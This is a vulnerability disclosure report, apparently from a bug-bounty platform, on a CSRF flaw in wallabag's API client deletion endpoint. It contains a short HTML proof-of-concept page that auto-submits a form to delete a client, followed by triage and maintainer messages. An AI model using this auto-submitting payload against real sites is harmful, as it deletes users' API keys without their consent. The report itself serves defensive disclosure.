CSRF leading to delete Client API in API clients management in wallabag/wallabag
Valid
Reported on
Mar 31st 2023
Description
wallabag was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete API key via
client/delete/{id}
Proof of Concept
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://192.168.125.133/developer/client/delete/2">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Impact
This vulnerability is capable of tricking a user to delete their own API key
Occurrences
We are processing your report and will contact the
wallabag
team within 24 hours.
6 months ago
TuanTH modified the report
6 months ago
We have contacted a member of the
wallabag
team and are waiting to hear back
6 months ago
The researcher's credibility has increased: +7
thanks @nicosomb, i hope this vulnerability can be assigned a CVE
DeveloperController.php#L72-L88
has been validated
Thank you @tht1997 !
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation